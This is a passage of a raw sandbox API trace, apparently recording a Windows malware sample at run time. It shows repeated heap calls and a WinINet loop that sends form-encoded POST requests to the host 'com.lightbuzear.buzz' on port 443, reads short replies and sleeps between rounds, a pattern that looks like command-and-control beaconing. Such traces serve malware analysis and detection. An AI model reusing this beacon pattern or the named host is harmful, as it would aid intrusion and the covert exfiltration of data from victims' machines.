0x47ce570 [0223.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0223.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0223.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0223.619] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0223.619] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0223.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155a8 [0223.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0223.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157d0 [0223.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155a8 | out: hHeap=0x4780000) returned 1 [0223.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0223.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0223.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48302f0 [0223.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0223.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0223.641] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48302f0 | out: hHeap=0x4780000) returned 1 [0223.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830188 [0223.641] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0223.642] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830070 [0223.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0223.642] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0223.643] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0223.643] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0224.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830070 | out: hHeap=0x4780000) returned 1 [0224.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0224.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0224.875] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0224.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0224.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0224.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0224.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0224.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0224.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0224.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156b0 [0224.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815740 [0224.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156b0 | out: hHeap=0x4780000) returned 1 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0224.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815740 | out: hHeap=0x4780000) returned 1 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48301b0 [0224.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0224.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48301b0 | out: hHeap=0x4780000) returned 1 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830228 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0224.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830250 [0224.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0224.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0224.877] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0224.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0224.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830250 | out: hHeap=0x4780000) returned 1 [0224.878] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0224.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0224.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0224.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0224.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0224.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0224.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0224.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0224.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0224.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0224.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157e8 [0224.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0224.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815590 [0224.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157e8 | out: hHeap=0x4780000) returned 1 [0224.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0224.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815590 | out: hHeap=0x4780000) returned 1 [0224.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482fff8 [0224.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0224.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0224.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482fff8 | out: hHeap=0x4780000) returned 1 [0224.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830070 [0224.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0224.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830250 [0224.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0224.880] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0224.880] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0224.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0224.880] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830250 | out: hHeap=0x4780000) returned 1 [0224.880] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0224.880] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0224.880] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0224.880] FreeLibrary (hLibModule=0x71570000) returned 1 [0224.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0224.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0224.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ef8 | out: hHeap=0x4780000) returned 1 [0224.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0224.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0224.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c28 | out: hHeap=0x4780000) returned 1 [0224.882] Sleep (dwMilliseconds=0x2710) [0224.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0224.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0224.895] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0224.895] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0224.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0224.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0224.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0224.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0224.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0224.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48155c0 [0224.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0224.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815560 [0224.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155c0 | out: hHeap=0x4780000) returned 1 [0224.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0224.896] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815560 | out: hHeap=0x4780000) returned 1 [0224.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48157b8 [0224.896] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0224.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0224.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0224.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0224.897] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0224.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5f0 [0224.897] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0224.897] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0224.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0224.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0224.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815608 [0224.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48155d8 [0224.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815608 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0224.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48155d8 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830db8 [0224.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0224.898] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c28 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0224.898] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0224.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0224.899] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0224.899] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0224.899] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0224.899] FreeLibrary (hLibModule=0x71780000) returned 1 [0224.900] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830db8 | out: hHeap=0x4780000) returned 1 [0224.900] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0224.900] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830db8 [0224.900] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0224.901] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0224.901] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0224.901] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0224.901] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0224.903] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0224.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0224.903] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0224.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0224.903] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0224.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157d0 [0224.903] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0224.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815620 [0224.903] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0224.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0224.903] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815620 | out: hHeap=0x4780000) returned 1 [0224.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815710 [0224.903] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ef8 [0224.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ef8 | out: hHeap=0x4780000) returned 1 [0224.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0224.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ef8 [0224.904] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0224.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830250 [0224.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0224.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0224.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0224.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0224.904] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0224.904] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0224.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0224.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0224.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0224.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48156c8 [0224.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0224.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815578 [0224.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48156c8 | out: hHeap=0x4780000) returned 1 [0224.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0224.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815578 | out: hHeap=0x4780000) returned 1 [0224.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x48156b0 [0224.905] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830408 [0224.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830408 | out: hHeap=0x4780000) returned 1 [0224.905] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0224.905] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0224.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0224.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0224.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0224.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x48157a0 [0224.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x48157d0 [0224.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157a0 | out: hHeap=0x4780000) returned 1 [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0224.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48157d0 | out: hHeap=0x4780000) returned 1 [0224.906] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830390 [0224.906] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0224.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0224.907] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830390 | out: hHeap=0x4780000) returned 1 [0224.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830160 [0224.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0224.907] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830048 [0224.907] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0224.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0224.908] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0224.908] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0224.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830048 | out: hHeap=0x4780000) returned 1 [0224.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0224.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0224.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0224.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0224.908] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0224.908] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0224.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0224.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815620 [0224.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815638 [0224.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815620 | out: hHeap=0x4780000) returned 1 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0224.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815638 | out: hHeap=0x4780000) returned 1 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48302a0 [0224.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0224.909] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48302a0 | out: hHeap=0x4780000) returned 1 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48302c8 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0224.909] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48302f0 [0224.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0224.910] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0224.910] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0224.910] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0226.064] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48302f0 | out: hHeap=0x4780000) returned 1 [0226.064] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0226.065] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0226.065] GetModuleHandleA (lpModuleName="Wininet.dll") 